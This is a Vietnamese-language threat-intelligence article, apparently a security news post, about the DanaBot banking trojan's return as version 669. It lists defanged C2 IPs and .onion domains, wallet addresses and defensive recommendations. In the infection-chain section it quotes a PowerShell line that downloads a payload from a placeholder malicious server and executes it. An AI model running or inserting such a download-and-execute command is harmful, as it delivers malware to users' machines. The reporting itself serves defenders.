DanaBot Trở Lại Với Phiên Bản 669 Sau Khi Bị Triệt Phá Bởi Operation Endgame
Gần sáu tháng sau khi bị gián đoạn bởi chiến dịch truy quét toàn cầu Operation Endgame vào tháng 5/2025, malware ngân hàng khét tiếng DanaBot đã chính thức quay trở lại với một biến thể mới mang mã phiên bản 669.
Các nhà nghiên cứu từ Zscaler ThreatLabz đã phát hiện biến thể này đang được triển khai trong các chiến dịch tấn công mới, cho thấy cơ sở hạ tầng chỉ huy–điều khiển (C2) đã được xây dựng lại hoàn toàn, kết hợp IP truyền thống, miền Tor (.onion) và hệ thống backconnect.
Bối Cảnh & Sự Trở Lại Của DanaBot
DanaBot được công bố lần đầu vào năm 2018 bởi Proofpoint, vốn là một trojan ngân hàng viết bằng Delphi, phát tán thông qua email độc hại và malvertising. Trong nhiều năm hoạt động, nó trở thành một dịch vụ malware-as-a-service (MaaS) phổ biến, được thuê bởi nhiều nhóm tội phạm mạng.
Chiến dịch Operation Endgame đã triệt phá nhiều hạ tầng phân phối malware, khiến DanaBot gần như “biến mất”. Tuy nhiên, các phân tích mới cho thấy nhóm vận hành DanaBot đã nhanh chóng tái cấu trúc hệ sinh thái của mình.
Phiên Bản 669 – Nâng Cấp Về Ẩn Mình & Kiến Trúc
Phiên bản DanaBot 669 thể hiện sự nâng cấp đáng kể về khả năng ẩn mình, kháng phân tích, và tăng độ bền vững của hạ tầng:
Áp dụng nhiều lớp obfuscation và kiểm tra môi trường sandbox trước khi chạy payload.
Tích hợp cơ chế C2 hỗn hợp, gồm:
IP-based C2:
62.60.226[.]146:443
62.60.226[.]154:443
80.64.19[.]39:443
Tor C2 (.onion):
aqpfkxxtvahlzr6vobt6fhj4riev7wxzoxwltbcysuybirygxzvp23ad[.]onion
fejdqikkdwheckrutucbbyeovpdnef4bopz2fx636i67p3qpffpfxxad[.]onion
t77e4phezpwqebpbhdagr26ewkfaxytscimhxofws4wcisjo4wundead[.]onion
vsjyfpt7vcd6atniefmz36ikxrqk5eyv573a2af4e2ntb437wdch63yd[.]onion
Hệ thống backconnect mới tại:
- 158.94.208[.]102 (ports 443 & 8080)
Mục đích của mô hình C2 mới là đảm bảo tính phục hồi, tính ẩn danh, và khó bị gỡ bỏ.
Chuỗi Lây Nhiễm – Multi-stage và Tinh Vi
DanaBot tiếp tục sử dụng nhiều vector tấn công quen thuộc:
Email độc hại (link hoặc file đính kèm)
SEO poisoning
Malvertising
→ Một số dẫn đến triển khai ransomware.
Giai đoạn đầu
Victim bị dụ mở tài liệu hoặc tập tin đã bị làm mờ, kích hoạt loader chính. Loader này tải xuống module mã hoá từ các C2 server:
Ví dụ lệnh triển khai payload ban đầu:
Invoke-WebRequest -Uri 'http://malicious-server/payload' -OutFile 'C:\Users\Public\payload.exe';
Start-Process 'C:\Users\Public\payload.exe'
Sau khi xâm nhập
Inject vào tiến trình Windows hợp lệ để duy trì và tránh bị phát hiện.
Tạo scheduled tasks để đảm bảo chạy liên tục.
Cho phép operator tải xuống payload mới từ xa nhờ kiến trúc mô-đun.
Khả Năng Tấn Công Tài Chính & Tiền Điện Tử
Bên cạnh hành vi trộm thông tin ngân hàng truyền thống, phiên bản 669 tiếp tục nhắm đến các ví tiền điện tử:
Các địa chỉ wallet được ghi nhận:
| Loại | Địa chỉ |
| Bitcoin | 12eTGpL8EqYowAfw7DdqmeiZ87R922wt5L |
| Ethereum | 0xb49a8bad358c0adb639f43c035b8c06777487dd7 |
| Litecoin | LedxKBWF4MiM3x9F7zmCdaxnnu8A8SUohZ |
| TRON | TY4iNhGut31cMbE3M6TU5CoCXvFJ5nP59i |
Dữ liệu đánh cắp được nén, mã hóa bằng RC4, sau đó gửi về C2 để tránh bị kiểm tra gói tin.
Khuyến nghị
Sự trở lại của DanaBot cho thấy:
Các nhóm tội phạm có thể tái cấu trúc nhanh ngay cả sau khi bị triệt phá.
Operation Endgame có thể chỉ tạo ra sự gián đoạn tạm thời.
Khi còn động lực tài chính, các chiến dịch malware-as-a-service vẫn tiếp tục sống lại.
Khuyến nghị cho tổ chức:
Cập nhật blocklist với các IoC mới do Zscaler cung cấp.
Tăng cường bảo vệ email, lọc phishing & maldoc.
Giám sát hành vi bất thường trên endpoint.
Cập nhật đầy đủ EDR/AV, đặc biệt với mẫu DanaBot 669.
IOC
IP and domain:
62.60.226[.]146:443
62.60.226[.]154:443
80.64.19[.]39:443
158.94.208[.]102:443
158.94.208[.]102:8080
aqpfkxxtvahlzr6vobt6fhj4riev7wxzoxwltbcysuybirygxzvp23ad[.]onion:443
fejdqikkdwheckrutucbbyeovpdnef4bopz2fx636i67p3qpffpfxxad[.]onion:443
t77e4phezpwqebpbhdagr26ewkfaxytscimhxofws4wcisjo4wundead[.]onion:443
vsjyfpt7vcd6atniefmz36ikxrqk5eyv573a2af4e2ntb437wdch63yd[.]onion:443
